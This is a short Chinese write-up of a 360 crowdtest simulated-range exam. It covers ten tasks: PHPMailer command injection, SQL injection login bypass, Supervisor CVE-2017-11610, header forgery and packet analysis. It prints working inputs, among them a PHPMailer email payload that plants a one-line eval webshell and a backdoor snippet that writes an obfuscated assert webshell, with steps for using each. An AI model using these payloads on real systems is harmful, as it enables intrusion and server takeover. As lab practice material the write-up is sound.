前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >记一次360众测仿真实战靶场考核WP

记一次360众测仿真实战靶场考核WP

作者头像
Timeline Sec
发布2020-04-08 15:38:36
3.1K0
发布2020-04-08 15:38:36
举报
文章被收录于专栏:Timeline SecTimeline Sec

1,微信 User-Agent头伪造

User-Agent: Mozilla/5.0 (iPhone; CPU iPhoneOS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365MicroMessenger/6.0 NetType/2GChrome/80.0.3987.149 Safari/537.36

2,PHPMailer远程命令执行漏洞

email填写:

代码语言:javascript
复制
"xxx". -OQueueDirectory=/tmp/. -X/var/www/html/xxxx.php @xxx.com

message填写:

代码语言:javascript
复制
<?php @eval($_GET[a]);?>

就会生成一个 xxxx.php,内容是 message填写的内容,访问即可getshell。

3,登录框SQL盲注

跑了半个多小时盲注。密码32位的还有两个。。。差点心态崩了。然后突然想起。。登录框注入。。。万能密码不就好了吗。。。

4,Supervisor远程命令执行漏洞(CVE-2017-11610)

https://blog.51cto.com/eth10/1955450 直接用exp秒

5,Referer来源伪造

burp把Referer改成他要的那个Referer就好了

6,一个很简单的代码审计,也称不上代码审计的审计

代码如下:

代码语言:javascript
复制
<?php
    if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87')    {
        $_=@fopen('t.php', 'a');
        @fwrite($_,"<?php \$_=str_replace('ilo','ass',str_replace('vey','ert',\$_GET[2]));
        @\$_(\$_POST[1]);?>");
        @fclose($_);
         }
?>

先带个 ?1=GET.fPZ87 访问之,然后就会生成一个t.php,访问t.php的时候get带上 ?2=ilovey 然后POST带上 1=php代码就好了。

7,PHPCMS v9.1.x的

只有一个前台,其他功能用不了。想登录二维码也没有,当时没时间就没做了

8,一个加解密啥的。是一个exe,吃了不会反编译的亏

9,wireshark分析数据包的。还挺简单。有技巧的查找

搜索php找到上传的马。然后看那个马干了啥就好了。

10,wireshark分析数据包的。也挺简单。有技巧的查找

找上传者的ip地址。一个技巧:把POST请求的数据包筛选出来。然后从第一个POST请求数据包开始提交IP地址。过滤PHP,POST,HTML

最终总结:

一开始做的时候会很慌,特别是我做SQL时间盲注的时候,一点点的出结果,等的人都傻了,还好后面想起可以万能密码登录,就是要随机应变吧,思路灵活点就好了。放松心态就好做很多。

鄙人不才,像我这种菜鸡。最终也是拿到了分数

相信各位师傅也是可以的,加油冲冲冲!!!

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-04-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
代码审计
代码审计(Code Audit,CA)提供通过自动化分析工具和人工审查的组合审计方式,对程序源代码逐条进行检查、分析,发现其中的错误信息、安全隐患和规范性缺陷问题,以及由这些问题引发的安全漏洞,提供代码修订措施和建议。支持脚本类语言源码以及有内存控制类源码。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档